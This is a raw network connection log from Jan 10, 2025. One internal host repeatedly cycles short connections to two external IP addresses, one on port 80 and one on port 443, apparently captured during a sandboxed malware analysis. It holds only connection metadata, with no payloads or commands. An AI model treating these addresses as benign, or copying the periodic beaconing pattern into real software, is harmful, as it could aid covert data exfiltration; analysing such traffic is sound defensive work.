Jan 10, 2025 22:44:26.685749054 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:26.685820103 CET	50049	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:26.686356068 CET	49973	80	192.168.2.6	132.226.8.169
Jan 10, 2025 22:44:26.686394930 CET	50049	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:26.686410904 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:26.730743885 CET	50048	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:27.316975117 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:27.318823099 CET	50049	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:27.318844080 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:27.318943024 CET	50049	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:27.318950891 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:27.698548079 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:27.698635101 CET	443	50049	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:27.698932886 CET	50049	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:27.699080944 CET	50049	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:27.701913118 CET	50048	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:27.703058958 CET	50050	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:27.706959009 CET	80	50048	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:27.707029104 CET	50048	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:27.707948923 CET	80	50050	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:27.708014011 CET	50050	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:27.708105087 CET	50050	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:27.712985039 CET	80	50050	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:28.271403074 CET	80	50050	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:28.273770094 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:28.273818016 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:28.273911953 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:28.274146080 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:28.274157047 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:28.324605942 CET	50050	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:28.906966925 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:28.908694983 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:28.908723116 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:28.908781052 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:28.908786058 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:29.441225052 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:29.441318035 CET	443	50051	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:29.441412926 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:29.441798925 CET	50051	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:29.444777966 CET	50050	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:29.445971012 CET	50052	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:29.449810028 CET	80	50050	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:29.449882030 CET	50050	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:29.450762033 CET	80	50052	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:29.450825930 CET	50052	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:29.450934887 CET	50052	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:29.455672979 CET	80	50052	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:30.034209967 CET	80	50052	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:30.035743952 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.035814047 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.035918951 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.036195993 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.036214113 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.074537992 CET	50052	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:30.702845097 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.704642057 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.704691887 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.704780102 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.704787970 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.987448931 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.987533092 CET	443	50053	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:30.987581015 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.988055944 CET	50053	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:30.992136002 CET	50052	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:30.993195057 CET	50054	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:30.997214079 CET	80	50052	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:30.997371912 CET	50052	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:30.998034954 CET	80	50054	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:30.998200893 CET	50054	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:30.998200893 CET	50054	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:31.003104925 CET	80	50054	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:31.590956926 CET	80	50054	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:31.592988014 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:31.593029976 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:31.593094110 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:31.593513012 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:31.593527079 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:31.636991024 CET	50054	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:32.201606035 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:32.204828024 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:32.204847097 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:32.204904079 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:32.204910040 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:32.503747940 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:32.503839016 CET	443	50055	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:32.503918886 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:32.504373074 CET	50055	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:32.507260084 CET	50054	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:32.508696079 CET	50056	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:32.512306929 CET	80	50054	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:32.512394905 CET	50054	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:32.513638973 CET	80	50056	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:32.513786077 CET	50056	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:32.513875008 CET	50056	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:32.518697977 CET	80	50056	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:33.096688032 CET	80	50056	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:33.102433920 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.102499008 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.102657080 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.102916002 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.102929115 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.137182951 CET	50056	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:33.723865986 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.725703955 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.725740910 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.725826025 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.725836039 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.964623928 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.964701891 CET	443	50057	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:33.964762926 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.965251923 CET	50057	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:33.968118906 CET	50056	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:33.969234943 CET	50058	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:33.973265886 CET	80	50056	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:33.973346949 CET	50056	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:33.974047899 CET	80	50058	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:33.974154949 CET	50058	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:33.974265099 CET	50058	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:33.979078054 CET	80	50058	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:34.541562080 CET	80	50058	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:34.542839050 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:34.542946100 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:34.543062925 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:34.543608904 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:34.543649912 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:34.590169907 CET	50058	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:35.181914091 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:35.183737040 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:35.183765888 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:35.183937073 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:35.183943033 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:35.501858950 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:35.502700090 CET	443	50059	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:35.502774000 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:35.503771067 CET	50059	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:35.511761904 CET	50058	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:35.512902975 CET	50060	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:35.516794920 CET	80	50058	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:35.516977072 CET	50058	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:35.520045996 CET	80	50060	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:35.520124912 CET	50060	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:35.520284891 CET	50060	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:35.525039911 CET	80	50060	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:36.085144997 CET	80	50060	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:36.086499929 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:36.086556911 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:36.086648941 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:36.086978912 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:36.086992025 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:36.137118101 CET	50060	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:36.711097002 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:36.713229895 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:36.713268995 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:36.713336945 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:36.713347912 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:37.002357960 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:37.002450943 CET	443	50061	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:37.002674103 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:37.002954960 CET	50061	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:37.009936094 CET	50060	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:37.011034966 CET	50062	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:37.015012980 CET	80	50060	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:37.015091896 CET	50060	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:37.016055107 CET	80	50062	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:37.017775059 CET	50062	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:37.017911911 CET	50062	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:37.023399115 CET	80	50062	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:37.644534111 CET	80	50062	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:37.645967007 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:37.646033049 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:37.646136999 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:37.646430016 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:37.646442890 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:37.699506044 CET	50062	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:38.296911001 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:38.298886061 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:38.298909903 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:38.298969030 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:38.298976898 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:38.669478893 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:38.669579029 CET	443	50063	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:38.669692039 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:38.670079947 CET	50063	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:38.673182011 CET	50062	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:38.673763037 CET	50064	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:38.678435087 CET	80	50062	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:38.678522110 CET	50062	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:38.678623915 CET	80	50064	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:38.678813934 CET	50064	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:38.678992987 CET	50064	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:38.683772087 CET	80	50064	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:39.255393028 CET	80	50064	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:39.275178909 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:39.275329113 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:39.275407076 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:39.275787115 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:39.275800943 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:39.308933020 CET	50064	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:39.885128021 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:39.886928082 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:39.886962891 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:39.887032986 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:39.887037992 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:40.277384996 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:40.277471066 CET	443	50065	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:40.277594090 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:40.277954102 CET	50065	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:40.280745983 CET	50064	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:40.281877041 CET	50067	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:40.285660028 CET	80	50064	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:40.285739899 CET	50064	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:40.286719084 CET	80	50067	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:40.286787987 CET	50067	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:40.286942959 CET	50067	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:40.291692972 CET	80	50067	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:40.892987967 CET	80	50067	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:40.896769047 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:40.896823883 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:40.896919966 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:40.897178888 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:40.897202015 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:40.949526072 CET	50067	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:41.502751112 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:41.504609108 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:41.504631042 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:41.504708052 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:41.504718065 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:41.777097940 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:41.777194977 CET	443	50068	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:41.777245045 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:41.777813911 CET	50068	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:41.797132015 CET	50067	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:41.799834013 CET	50069	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:41.802217007 CET	80	50067	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:41.802284956 CET	50067	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:41.804656982 CET	80	50069	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:41.804748058 CET	50069	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:41.806492090 CET	50069	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:41.811300993 CET	80	50069	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:42.411880016 CET	80	50069	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:42.413012981 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:42.413057089 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:42.413121939 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:42.413383961 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:42.413399935 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:42.465181112 CET	50069	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:43.035051107 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:43.037231922 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:43.037254095 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:43.037312984 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:43.037323952 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:43.444612980 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:43.444820881 CET	443	50070	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:43.444971085 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:43.445239067 CET	50070	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:43.497297049 CET	50069	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:43.497981071 CET	50071	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:43.502405882 CET	80	50069	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:43.502844095 CET	80	50071	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:43.502955914 CET	50069	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:43.502990961 CET	50071	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:43.504038095 CET	50071	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:43.508860111 CET	80	50071	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:44.100224018 CET	80	50071	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:44.101434946 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:44.101489067 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:44.101547956 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:44.101800919 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:44.101816893 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:44.152816057 CET	50071	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:44.743817091 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:44.746058941 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:44.746100903 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:44.746211052 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:44.746217966 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:45.313694000 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:45.313785076 CET	443	50072	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:45.313883066 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:45.314416885 CET	50072	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:45.317955017 CET	50071	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:45.319329023 CET	50073	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:45.322963953 CET	80	50071	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:45.323074102 CET	50071	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:45.324232101 CET	80	50073	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:45.324331999 CET	50073	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:45.324461937 CET	50073	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:45.329292059 CET	80	50073	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:45.892574072 CET	80	50073	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:45.894061089 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:45.894114017 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:45.894195080 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:45.894510031 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:45.894532919 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:45.933907986 CET	50073	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:46.510425091 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:46.512485981 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:46.512509108 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:46.512572050 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:46.512583971 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:46.861061096 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:46.861140966 CET	443	50074	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:46.861272097 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:46.861727953 CET	50074	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:46.864434004 CET	50073	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:46.865411997 CET	50075	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:46.869502068 CET	80	50073	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:46.869613886 CET	50073	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:46.870179892 CET	80	50075	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:46.870249987 CET	50075	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:46.870397091 CET	50075	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:46.875189066 CET	80	50075	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:47.434124947 CET	80	50075	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:47.435343027 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:47.435390949 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:47.435730934 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:47.435730934 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:47.435776949 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:47.480914116 CET	50075	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:48.045017958 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:48.047787905 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:48.047808886 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:48.047852039 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:48.047868967 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:48.356216908 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:48.356312990 CET	443	50076	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:48.356391907 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:48.356784105 CET	50076	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:48.359922886 CET	50075	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:48.360991001 CET	50077	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:48.365320921 CET	80	50075	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:48.365412951 CET	50075	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:48.365883112 CET	80	50077	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:48.365947962 CET	50077	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:48.366087914 CET	50077	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:48.370910883 CET	80	50077	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:48.977690935 CET	80	50077	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:48.978902102 CET	50078	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:48.978960991 CET	443	50078	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:48.979077101 CET	50078	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:48.979477882 CET	50078	443	192.168.2.6	149.154.167.220
